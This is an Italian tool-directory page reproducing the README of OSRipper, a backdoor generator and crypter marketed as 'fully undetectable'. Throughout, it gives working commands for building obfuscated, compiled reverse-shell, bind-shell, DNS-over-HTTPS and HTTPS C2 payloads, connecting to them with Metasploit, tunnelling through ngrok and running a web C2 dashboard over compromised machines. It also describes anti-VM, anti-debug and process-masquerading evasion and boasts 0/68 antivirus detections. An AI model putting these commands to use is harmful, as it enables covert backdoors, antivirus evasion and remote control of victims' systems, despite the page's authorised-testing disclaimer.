Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OSRipper — Framework di backdoor e crypter multipiattaforma che elude l'antivirus, con un webUI leggero integrato. | Kitploit
Strumenti/GitHubGitHub/noahoksuz/osripper
Framework di ExploitGenerazione di PayloadEvasione IDS/IPSPost-ExploitPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming
GitHubnoahoksuz/osripper

OSRipper

Framework di backdoor e crypter multipiattaforma che elude l'antivirus, con un webUI leggero integrato.

Vedi Repository
32850586 mesi faRevisionato da Kitploit
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

Generatore di payload e cryptor cross-platform avanzato con capacità FUD

Caratteristiche • Avvio Rapido • Interfaccia Web • Tipi di Payload • Documentazione


Panoramica

OSRipper è un sofisticato generatore di backdoor e cryptor completamente non rilevabile (FUD), progettato per test di penetrazione autorizzati e operazioni red team. Dispone di tecniche di evasione avanzate, molteplici tipi di payload e un'interfaccia C2 moderna basata sul web per la gestione dei sistemi compromessi.

Punti Salienti

  • Completamente Non Rilevabile (FUD) - Tecniche di evasione avanzate che bypassano le soluzioni AV moderne
  • Interfaccia C2 Basata sul Web - Dashboard moderna per la gestione delle sessioni attive
  • Molteplici Tipi di Payload - Bind shell, reverse shell, DoH C2, HTTPS C2 e altro ancora
  • Offuscamento Multi-Livello - Offuscamento standard e potenziato con variabili randomizzate
  • Compilazione Binaria - Compilazione di payload in eseguibili autonomi
  • Comunicazioni Criptate - Canali C2 SSL/TLS e HTTPS con pinning dei certificati
  • Funzionalità Stealth - Rilevamento VM, anti-debug, mascheramento dei processi

Caratteristiche

Generazione Payload

Tipo PayloadDescrizioneCaso d'Uso
Bind ShellApre una porta sulla macchina vittimaAccesso diretto quando le connessioni reverse sono bloccate
Reverse TCP MeterpreterConnessione reverse criptata SSL/TLSTest di penetrazione standard
DNS-over-HTTPS C2Canale C2 stealth basato su DoHBypassare restrizioni di rete
HTTPS C2Canale C2 HTTPS con pinning del certificatoCanale C2 sicuro e autenticato
Payload StagedConsegna web multi-stadioDistribuzione stealth potenziata
Cryptor Codice PersonalizzatoOffusca qualsiasi script PythonCriptazione payload personalizzata

Tecniche di Evasione

  • Offuscamento Avanzato - Codifica a più livelli con variabili casuali
  • Offuscamento Potenziato - Anti-debug, rilevamento VM, iniezione di codice spazzatura
  • Rilevamento Anti-VM - Evasione di sandbox e macchine virtuali
  • Ritardi Stealth - Ritardi di avvio casuali (5-15 secondi)
  • Mascheramento dei Processi - Camuffamento come processi di sistema legittimi
  • Randomizzazione delle Firme - Ogni payload è unico

Funzionalità Interfaccia Web

  • Dashboard Sessioni - Visualizza tutte le sessioni C2 attive
  • Terminale Interattivo - Esegui comandi tramite interfaccia web
  • Generatore Payload - Genera payload direttamente dall'interfaccia web
  • Gestione Sessioni - Visualizza info di sistema, cronologia comandi e gestisci sessioni
  • Aggiornamenti in Tempo Reale - Esecuzione comandi e visualizzazione risposte in tempo reale

Capacità Avanzate

  • Integrazione Ngrok - Creazione automatica di tunnel per IP dinamici
  • Pinning dei Certificati - HTTPS C2 sicuro con validazione del certificato
  • Persistenza delle Sessioni - Mantiene le connessioni anche dopo riavvii
  • Coda Comandi - Accoda comandi per agenti offline
  • Analisi Risposte - Analisi automatica dell'output dei comandi

Avvio Rapido

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# Installa le dipendenze
pip3 install -r requirements.txt

# Installa il pacchetto
pip3 install -e .

Importante — esegui il setup per funzionalità opzionali (ngrok, compilazione binaria):
Su molti sistemi (specialmente Linux con un ambiente Python gestito esternamente), devi eseguire il setup integrato in modo che le dipendenze opzionali vengano installate nel venv di OSRipper. Fallo una volta dopo l'installazione:

root@kitploit:~
osripper-cli setup

Questo crea ~/.local/share/osripper/venv, installa pyngrok, nuitka e sandboxed lì, e tutte le esecuzioni successive di osripper / osripper-cli li useranno automaticamente. Senza questo, --ngrok e --compile ti chiederanno di eseguire il setup. Usa osripper-cli setup --system solo se preferisci un'installazione pip di sistema/utente invece del venv.

Utilizzo Base

Modalità Interattiva:

root@kitploit:~
osripper
# oppure
python3 -m osripper

Riga di Comando:

root@kitploit:~
# Genera reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# Genera payload DoH C2
osripper-cli doh -d example.com --obfuscate --compile

Interfaccia Web:

root@kitploit:~
# Avvia il server C2 con interfaccia web
python -m osripper.c2.server example.com --port 5000

# Accedi alla dashboard su http://localhost:5000

Interfaccia Web

OSRipper include un'interfaccia C2 moderna basata sul web per la gestione dei sistemi compromessi.

Caratteristiche

  • Dashboard - Panoramica di tutte le sessioni attive
  • Gestione Sessioni - Visualizza informazioni di sistema ed esegui comandi
  • Generatore Payload - Genera payload DoH e HTTPS tramite interfaccia web
  • Cronologia Comandi - Tiene traccia di tutti i comandi eseguiti e delle risposte
  • Aggiornamenti in Tempo Reale - Esecuzione comandi e visualizzazione risposte in tempo reale

Avvio del Server C2

root@kitploit:~
# Utilizzo base
python -m osripper.c2.server example.com

# Con HTTPS
python -m osripper.c2.server example.com --https

# Porta personalizzata
python -m osripper.c2.server example.com --port 8080

# Con certificato personalizzato
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

Accesso all'Interfaccia Web

Una volta che il server è in esecuzione, accedi alla dashboard su:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (se abilitato)

Tipi di Payload

1. Backdoor Bind Shell

Apre una porta sulla macchina vittima e attende connessioni.

root@kitploit:~
osripper-cli bind -p 4444 --obfuscate --compile

Connessione:

root@kitploit:~
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST ip_vittima; set RPORT 4444; exploit'

2. Reverse TCP Meterpreter

Connessione reverse criptata con SSL/TLS.

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-over-HTTPS C2

Canale C2 stealth che utilizza il protocollo DNS-over-HTTPS. Bypassa molte restrizioni di rete.

root@kitploit:~
# Genera payload
osripper-cli doh -d example.com --obfuscate --compile

# Avvia server C2
python -m osripper.c2.server example.com

Caratteristiche:

  • Comunicazione stealth basata su DNS
  • Interfaccia web per la gestione delle sessioni
  • Persistenza automatica delle sessioni
  • Coda comandi per agenti offline

4. HTTPS C2 (Pinning del Certificato)

HTTPS C2 sicuro con pinning del certificato per l'autenticazione.

root@kitploit:~
# Genera payload (tramite interfaccia web o CLI)
# Avvia server C2 con HTTPS
python -m osripper.c2.server example.com --https

# Ottieni l'impronta del certificato
curl http://localhost:5000/api/cert-fingerprint

Caratteristiche:

  • Pinning del certificato per la sicurezza
  • Comunicazione HTTPS criptata
  • Integrazione con interfaccia web
  • Gestione sessioni

5. Payload Staged

Consegna web multi-stadio per stealth potenziato.

root@kitploit:~
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. Cryptor Codice Personalizzato

Offusca e cripta qualsiasi script Python.

root@kitploit:~
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

Interfaccia a Riga di Comando

Opzioni Comuni

OpzioneDescrizione
--obfuscateAbilita offuscamento multi-livello
--enhancedOffuscamento potenziato (anti-debug, rilevamento VM)
--compileCompila in binario autonomo
--icon PERCORSOIcona personalizzata per il binario compilato
--delayAggiunge ritardo di avvio casuale (5-15 secondi)
--output, -o NOMENome file di output
--quiet, -qModalità silenziosa (output minimo)

Esempi

root@kitploit:~
# Reverse shell completo
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# DoH C2 con tutte le funzionalità
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# Criptazione script personalizzato
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# Utilizzo di ngrok per IP dinamico
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Risultati di Rilevamento

Ultime Scansioni VirusTotal

  • Payload Python: 0/68 Tasso di Rilevamento
  • Binario Compilato: 0/68 Tasso di Rilevamento

Risultato antiscan

Risultati Antiscan


Architettura

root@kitploit:~
┌─────────────────┐
│   Binario       │
│   Generato      │
└─────────────────┘
         │
         │ Esecuzione
         ▼
┌──────────────────┐
│ Dropper          │
│ Offuscato        │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   SERVER C2     │
│   (Interfaccia  │
│    Web)         │
│                 │
└─────────────────┘
         │
         │ Comando/Risposta
         ▼
┌─────────────────┐
│   Agente        │
│   Esecuzione    │
└─────────────────┘

Screenshot

Interfaccia Principale

Dashboard Interfaccia Web

Dashboard Interfaccia Web


Configurazione Avanzata

Integrazione Ngrok

root@kitploit:~
# Genera payload con ngrok
osripper-cli reverse --ngrok -p 4444

# Segui le istruzioni per configurare il tunnel
# Esegui: ngrok tcp 4444

Icone Personalizzate

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /percorso/icona.ico

Livelli di Offuscamento

Offuscamento Standard:

  • Codifica multi-livello
  • Randomizzazione delle variabili
  • Offuscamento della struttura del codice

Offuscamento Potenziato:

  • Tutte le funzionalità standard
  • Tecniche anti-debug
  • Rilevamento VM
  • Iniezione di codice spazzatura
  • Evasione avanzata
root@kitploit:~
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# Potenziato
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

Configurazione HTTPS C2

root@kitploit:~
# 1. Avvia server C2 con HTTPS
python -m osripper.c2.server example.com --https

# 2. Ottieni l'impronta del certificato
curl http://localhost:5000/api/cert-fingerprint

# 3. Genera payload con l'impronta (tramite interfaccia web)
# Oppure usa l'impronta nella generazione del payload

Documentazione

  • Wiki - Documentazione completa
  • Guida all'Uso - Istruzioni dettagliate sull'uso
  • Riferimento API - Documentazione per sviluppatori

Roadmap

Completato (v0.3.2)

  • Generazione payload FUD (0/68 rilevamenti)
  • Interfaccia C2 basata sul web
  • Payload C2 DNS-over-HTTPS
  • HTTPS C2 con pinning del certificato
  • Motore di offuscamento multi-livello
  • Sistema di gestione sessioni
  • Coda e esecuzione comandi
  • Rilevamento Anti-VM
  • Mascheramento dei processi

In Corso

  • Moduli di post-sfruttamento potenziati
  • Meccanismi di persistenza avanzati
  • Caricamento/scaricamento file tramite interfaccia web
  • Supporto multi-utente per server C2

Piani Futuri

  • Tecniche di evasione basate su IA
  • Infrastruttura C2 basata su blockchain
  • Supporto per piattaforme mobili
  • Payload di ingegneria sociale avanzati

Contribuire

Accogliamo con favore i contributi della comunità di ricerca sulla sicurezza!

Come Contribuire

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità (git checkout -b feature/funzionalità-straordinaria)
  3. Committa le tue modifiche (git commit -m 'Aggiungi funzionalità straordinaria')
  4. Pusha sul branch (git push origin feature/funzionalità-straordinaria)
  5. Apri una Pull Request

Linee Guida per lo Sviluppo

  • Segui gli standard di codifica PEP 8
  • Aggiungi docstring a tutte le funzioni
  • Testa su più piattaforme
  • Assicurati che le capacità FUD rimangano intatte

Riconoscimenti

Un ringraziamento speciale alla comunità di ricerca sulla sicurezza e a questi progetti:

  • htr-tech/PyObfuscate - Ispirazione per l'offuscamento
  • cedowens/SwiftBelt - Enumerazione macOS
  • Metasploit Framework - Gestione dei payload

Disclaimer Legale

IMPORTANTE: Questo strumento è sviluppato esclusivamente per scopi educativi e test di penetrazione autorizzati.

  • Uso Autorizzato: Ricerca sulla sicurezza, test di penetrazione, esercitazioni red team
  • Uso Proibito: Accesso non autorizzato, attività malevole, scopi illegali

Gli sviluppatori non sono responsabili per l'uso improprio di questo software. Gli utenti devono rispettare tutte le leggi e le normative applicabili.


Supporto

  • Segnalazione Bug: Apri un Issue
  • Richiesta Funzionalità: Discussioni
  • Problemi di Sicurezza: Contatta i maintainer privatamente
Scarica lo strumento